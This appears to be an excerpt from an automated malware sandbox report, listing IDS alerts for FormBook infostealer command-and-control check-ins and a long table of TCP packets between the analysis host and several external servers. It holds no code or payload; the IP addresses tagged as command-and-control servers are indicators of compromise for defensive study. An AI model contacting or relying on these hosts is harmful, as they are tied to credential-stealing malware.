2025-01-10T18:15:22.967562+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50001	13.248.169.48	80	TCP
2025-01-10T18:15:26.585393+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50002	13.248.169.48	80	TCP
2025-01-10T18:15:28.098403+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50003	13.248.169.48	80	TCP
2025-01-10T18:15:30.618982+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	50004	13.248.169.48	80	TCP
2025-01-10T18:15:36.868602+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50005	136.243.64.147	80	TCP
2025-01-10T18:15:39.408020+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50006	136.243.64.147	80	TCP
2025-01-10T18:15:41.952594+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50007	136.243.64.147	80	TCP
2025-01-10T18:15:44.508368+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	50008	136.243.64.147	80	TCP
2025-01-10T18:15:51.183103+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50009	85.159.66.93	80	TCP
2025-01-10T18:15:53.726040+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50010	85.159.66.93	80	TCP
2025-01-10T18:15:56.285894+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50011	85.159.66.93	80	TCP
2025-01-10T18:15:58.015129+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	50012	85.159.66.93	80	TCP
2025-01-10T18:16:04.554240+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50013	85.159.66.93	80	TCP
2025-01-10T18:16:07.101183+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50014	85.159.66.93	80	TCP
2025-01-10T18:16:09.648013+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50015	85.159.66.93	80	TCP
2025-01-10T18:16:11.436930+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	50016	85.159.66.93	80	TCP
2025-01-10T18:16:17.529702+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50017	13.228.81.39	80	TCP
2025-01-10T18:16:20.233716+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50018	13.228.81.39	80	TCP
2025-01-10T18:16:22.746425+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50019	13.228.81.39	80	TCP
2025-01-10T18:16:25.313449+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	50020	13.228.81.39	80	TCP
2025-01-10T18:16:30.975998+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50021	188.114.96.3	80	TCP
2025-01-10T18:16:33.510239+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50022	188.114.96.3	80	TCP
2025-01-10T18:16:36.091341+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	50023	188.114.96.3	80	TCP
2025-01-10T18:16:38.676743+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	50024	188.114.96.3	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 18:13:15.137939930 CET	49896	80	192.168.2.10	3.33.130.190
Jan 10, 2025 18:13:15.142929077 CET	80	49896	3.33.130.190	192.168.2.10
Jan 10, 2025 18:13:15.143131971 CET	49896	80	192.168.2.10	3.33.130.190
Jan 10, 2025 18:13:15.153170109 CET	49896	80	192.168.2.10	3.33.130.190
Jan 10, 2025 18:13:15.158082008 CET	80	49896	3.33.130.190	192.168.2.10
Jan 10, 2025 18:13:15.603010893 CET	80	49896	3.33.130.190	192.168.2.10
Jan 10, 2025 18:13:15.603091002 CET	80	49896	3.33.130.190	192.168.2.10
Jan 10, 2025 18:13:15.603179932 CET	49896	80	192.168.2.10	3.33.130.190
Jan 10, 2025 18:13:15.607050896 CET	49896	80	192.168.2.10	3.33.130.190
Jan 10, 2025 18:13:15.611866951 CET	80	49896	3.33.130.190	192.168.2.10
Jan 10, 2025 18:13:39.007349014 CET	49977	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:39.012165070 CET	80	49977	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:39.012270927 CET	49977	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:39.027168989 CET	49977	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:39.031982899 CET	80	49977	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:40.538444042 CET	49977	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:40.586857080 CET	80	49977	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:41.557497025 CET	49978	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:41.562304020 CET	80	49978	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:41.562397003 CET	49978	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:41.577199936 CET	49978	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:41.582026958 CET	80	49978	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:42.045332909 CET	80	49978	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:42.045464993 CET	80	49978	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:42.045527935 CET	49978	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:42.365952015 CET	80	49977	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:42.366154909 CET	49977	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:43.085242033 CET	49978	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:44.105289936 CET	49979	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:44.110152960 CET	80	49979	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:44.110224009 CET	49979	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:44.125709057 CET	49979	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:44.130484104 CET	80	49979	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:44.130578995 CET	80	49979	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:44.582614899 CET	80	49979	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:44.582812071 CET	80	49979	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:44.582945108 CET	49979	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:45.632246971 CET	49979	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:46.650904894 CET	49980	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:46.655846119 CET	80	49980	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:46.655927896 CET	49980	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:46.665102959 CET	49980	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:46.669970036 CET	80	49980	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:47.137406111 CET	80	49980	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:47.137501955 CET	80	49980	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:47.140360117 CET	49980	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:47.140360117 CET	49980	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:13:47.145167112 CET	80	49980	13.248.169.48	192.168.2.10
Jan 10, 2025 18:13:52.171360970 CET	49981	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:52.176184893 CET	80	49981	47.83.1.90	192.168.2.10
Jan 10, 2025 18:13:52.176299095 CET	49981	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:52.191030979 CET	49981	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:52.195914984 CET	80	49981	47.83.1.90	192.168.2.10
Jan 10, 2025 18:13:53.694777012 CET	49981	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:53.699827909 CET	80	49981	47.83.1.90	192.168.2.10
Jan 10, 2025 18:13:53.699906111 CET	49981	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:54.713471889 CET	49982	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:54.718354940 CET	80	49982	47.83.1.90	192.168.2.10
Jan 10, 2025 18:13:54.718518972 CET	49982	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:54.733218908 CET	49982	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:54.738018990 CET	80	49982	47.83.1.90	192.168.2.10
Jan 10, 2025 18:13:56.241584063 CET	49982	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:56.246656895 CET	80	49982	47.83.1.90	192.168.2.10
Jan 10, 2025 18:13:56.246754885 CET	49982	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:57.260168076 CET	49983	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:57.265080929 CET	80	49983	47.83.1.90	192.168.2.10
Jan 10, 2025 18:13:57.265324116 CET	49983	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:57.280318975 CET	49983	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:57.285223961 CET	80	49983	47.83.1.90	192.168.2.10
Jan 10, 2025 18:13:57.285283089 CET	80	49983	47.83.1.90	192.168.2.10
Jan 10, 2025 18:13:58.788556099 CET	49983	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:58.793562889 CET	80	49983	47.83.1.90	192.168.2.10
Jan 10, 2025 18:13:58.793632030 CET	49983	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:59.807118893 CET	49984	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:59.811997890 CET	80	49984	47.83.1.90	192.168.2.10
Jan 10, 2025 18:13:59.812103987 CET	49984	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:59.820938110 CET	49984	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:13:59.825711966 CET	80	49984	47.83.1.90	192.168.2.10
Jan 10, 2025 18:14:01.552908897 CET	80	49984	47.83.1.90	192.168.2.10
Jan 10, 2025 18:14:01.553312063 CET	80	49984	47.83.1.90	192.168.2.10
Jan 10, 2025 18:14:01.553375006 CET	49984	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:14:01.556427956 CET	49984	80	192.168.2.10	47.83.1.90
Jan 10, 2025 18:14:01.561264038 CET	80	49984	47.83.1.90	192.168.2.10
Jan 10, 2025 18:14:06.772954941 CET	49985	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:06.777822971 CET	80	49985	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:06.777920961 CET	49985	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:06.793493986 CET	49985	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:06.798299074 CET	80	49985	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:07.447912931 CET	80	49985	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:07.447962999 CET	80	49985	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:07.448116064 CET	49985	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:08.304521084 CET	49985	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:09.374083996 CET	49986	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:09.378860950 CET	80	49986	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:09.380495071 CET	49986	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:09.396476030 CET	49986	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:09.401406050 CET	80	49986	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:10.100686073 CET	80	49986	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:10.100733995 CET	80	49986	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:10.100815058 CET	49986	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:10.899890900 CET	49986	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:11.917062044 CET	49987	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:11.921888113 CET	80	49987	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:11.921967983 CET	49987	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:11.939126015 CET	49987	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:11.943970919 CET	80	49987	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:11.944037914 CET	80	49987	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:12.573359966 CET	80	49987	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:12.573434114 CET	80	49987	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:12.573633909 CET	49987	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:13.444644928 CET	49987	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:14.464808941 CET	49988	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:14.469686031 CET	80	49988	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:14.469770908 CET	49988	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:14.482413054 CET	49988	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:14.487299919 CET	80	49988	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:15.194541931 CET	80	49988	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:15.194583893 CET	80	49988	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:15.196530104 CET	49988	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:15.205385923 CET	49988	80	192.168.2.10	103.106.67.112
Jan 10, 2025 18:14:15.210144997 CET	80	49988	103.106.67.112	192.168.2.10
Jan 10, 2025 18:14:28.974025011 CET	49989	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:28.978893042 CET	80	49989	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:28.980659962 CET	49989	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:28.996279001 CET	49989	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:29.001403093 CET	80	49989	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:29.879832983 CET	80	49989	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:29.879996061 CET	80	49989	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:29.880052090 CET	49989	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:30.507181883 CET	49989	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:31.584506989 CET	49990	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:31.589353085 CET	80	49990	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:31.596354961 CET	49990	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:31.817552090 CET	49990	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:31.822376013 CET	80	49990	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:32.489439011 CET	80	49990	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:32.491662025 CET	80	49990	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:32.491712093 CET	49990	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:33.320364952 CET	49990	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:34.340567112 CET	49991	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:34.345478058 CET	80	49991	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:34.345577955 CET	49991	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:34.402323961 CET	49991	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:34.407217979 CET	80	49991	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:34.407351017 CET	80	49991	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:35.225827932 CET	80	49991	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:35.225967884 CET	80	49991	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:35.226044893 CET	49991	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:35.913547039 CET	49991	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:36.934812069 CET	49992	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:36.939789057 CET	80	49992	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:36.939881086 CET	49992	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:36.951551914 CET	49992	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:36.956434965 CET	80	49992	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:37.803606033 CET	80	49992	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:37.803770065 CET	80	49992	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:37.804647923 CET	49992	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:37.808644056 CET	49992	80	192.168.2.10	103.23.149.28
Jan 10, 2025 18:14:37.813477039 CET	80	49992	103.23.149.28	192.168.2.10
Jan 10, 2025 18:14:50.980443001 CET	49993	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:50.985371113 CET	80	49993	162.0.236.169	192.168.2.10
Jan 10, 2025 18:14:50.985460997 CET	49993	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:51.004010916 CET	49993	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:51.008933067 CET	80	49993	162.0.236.169	192.168.2.10
Jan 10, 2025 18:14:51.587500095 CET	80	49993	162.0.236.169	192.168.2.10
Jan 10, 2025 18:14:51.587956905 CET	80	49993	162.0.236.169	192.168.2.10
Jan 10, 2025 18:14:51.588067055 CET	49993	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:52.507566929 CET	49993	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:53.530087948 CET	49994	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:53.535057068 CET	80	49994	162.0.236.169	192.168.2.10
Jan 10, 2025 18:14:53.535187006 CET	49994	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:53.558306932 CET	49994	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:53.563159943 CET	80	49994	162.0.236.169	192.168.2.10
Jan 10, 2025 18:14:54.184365034 CET	80	49994	162.0.236.169	192.168.2.10
Jan 10, 2025 18:14:54.184392929 CET	80	49994	162.0.236.169	192.168.2.10
Jan 10, 2025 18:14:54.184545040 CET	49994	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:55.069873095 CET	49994	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:56.088557959 CET	49995	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:56.093417883 CET	80	49995	162.0.236.169	192.168.2.10
Jan 10, 2025 18:14:56.094888926 CET	49995	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:56.109831095 CET	49995	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:56.114670992 CET	80	49995	162.0.236.169	192.168.2.10
Jan 10, 2025 18:14:56.114898920 CET	80	49995	162.0.236.169	192.168.2.10
Jan 10, 2025 18:14:56.802335978 CET	80	49995	162.0.236.169	192.168.2.10
Jan 10, 2025 18:14:56.802402973 CET	80	49995	162.0.236.169	192.168.2.10
Jan 10, 2025 18:14:56.802464008 CET	49995	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:57.617017984 CET	49995	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:58.636547089 CET	49996	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:58.641525030 CET	80	49996	162.0.236.169	192.168.2.10
Jan 10, 2025 18:14:58.644741058 CET	49996	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:58.655452013 CET	49996	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:58.660399914 CET	80	49996	162.0.236.169	192.168.2.10
Jan 10, 2025 18:14:59.233835936 CET	80	49996	162.0.236.169	192.168.2.10
Jan 10, 2025 18:14:59.233850956 CET	80	49996	162.0.236.169	192.168.2.10
Jan 10, 2025 18:14:59.234035015 CET	49996	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:59.237294912 CET	49996	80	192.168.2.10	162.0.236.169
Jan 10, 2025 18:14:59.242798090 CET	80	49996	162.0.236.169	192.168.2.10
Jan 10, 2025 18:15:04.267338037 CET	49997	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:04.273454905 CET	80	49997	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:04.277118921 CET	49997	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:04.291728973 CET	49997	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:04.296570063 CET	80	49997	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:04.780093908 CET	80	49997	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:04.780169010 CET	80	49997	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:04.780217886 CET	49997	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:05.804594040 CET	49997	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:06.824996948 CET	49998	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:06.829883099 CET	80	49998	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:06.829982042 CET	49998	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:06.849000931 CET	49998	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:06.853857994 CET	80	49998	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:07.313658953 CET	80	49998	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:07.313800097 CET	80	49998	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:07.313899994 CET	49998	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:08.351324081 CET	49998	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:09.369834900 CET	49999	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:09.374785900 CET	80	49999	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:09.374861956 CET	49999	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:09.390746117 CET	49999	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:09.395601988 CET	80	49999	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:09.395766973 CET	80	49999	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:09.873769045 CET	80	49999	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:09.873856068 CET	80	49999	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:09.874067068 CET	49999	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:10.897984028 CET	49999	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:11.916506052 CET	50000	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:11.921428919 CET	80	50000	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:11.921583891 CET	50000	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:11.930669069 CET	50000	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:11.935533047 CET	80	50000	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:17.406795979 CET	80	50000	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:17.407073975 CET	80	50000	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:17.407134056 CET	50000	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:17.409571886 CET	50000	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:17.415062904 CET	80	50000	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:22.485338926 CET	50001	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:22.490272999 CET	80	50001	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:22.490427017 CET	50001	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:22.508578062 CET	50001	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:22.513467073 CET	80	50001	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:22.967448950 CET	80	50001	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:22.967493057 CET	80	50001	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:22.967561960 CET	50001	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:24.022871971 CET	50001	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:25.042373896 CET	50002	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:25.047266006 CET	80	50002	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:25.047363997 CET	50002	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:25.070415020 CET	50002	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:25.075440884 CET	80	50002	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:26.585392952 CET	50002	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:26.631011963 CET	80	50002	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:27.604574919 CET	50003	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:27.609580040 CET	80	50003	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:27.609658957 CET	50003	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:27.625950098 CET	50003	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:27.631019115 CET	80	50003	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:27.631036997 CET	80	50003	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:28.098017931 CET	80	50003	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:28.098123074 CET	80	50003	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:28.098402977 CET	50003	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:28.414495945 CET	80	50002	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:28.416779041 CET	50002	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:29.132441044 CET	50003	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:30.152676105 CET	50004	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:30.157634974 CET	80	50004	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:30.157743931 CET	50004	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:30.167126894 CET	50004	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:30.172035933 CET	80	50004	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:30.618510962 CET	80	50004	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:30.618714094 CET	80	50004	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:30.618982077 CET	50004	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:30.621635914 CET	50004	80	192.168.2.10	13.248.169.48
Jan 10, 2025 18:15:30.626463890 CET	80	50004	13.248.169.48	192.168.2.10
Jan 10, 2025 18:15:36.204596996 CET	50005	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:36.209549904 CET	80	50005	136.243.64.147	192.168.2.10
Jan 10, 2025 18:15:36.209729910 CET	50005	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:36.229028940 CET	50005	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:36.233854055 CET	80	50005	136.243.64.147	192.168.2.10
Jan 10, 2025 18:15:36.868447065 CET	80	50005	136.243.64.147	192.168.2.10
Jan 10, 2025 18:15:36.868527889 CET	80	50005	136.243.64.147	192.168.2.10
Jan 10, 2025 18:15:36.868602037 CET	50005	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:37.741638899 CET	50005	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:38.763027906 CET	50006	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:38.768004894 CET	80	50006	136.243.64.147	192.168.2.10
Jan 10, 2025 18:15:38.768184900 CET	50006	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:38.783001900 CET	50006	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:38.787935019 CET	80	50006	136.243.64.147	192.168.2.10
Jan 10, 2025 18:15:39.407567978 CET	80	50006	136.243.64.147	192.168.2.10
Jan 10, 2025 18:15:39.407928944 CET	80	50006	136.243.64.147	192.168.2.10
Jan 10, 2025 18:15:39.408020020 CET	50006	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:40.288485050 CET	50006	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:41.308284044 CET	50007	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:41.313302040 CET	80	50007	136.243.64.147	192.168.2.10
Jan 10, 2025 18:15:41.313393116 CET	50007	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:41.328844070 CET	50007	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:41.333780050 CET	80	50007	136.243.64.147	192.168.2.10
Jan 10, 2025 18:15:41.333900928 CET	80	50007	136.243.64.147	192.168.2.10
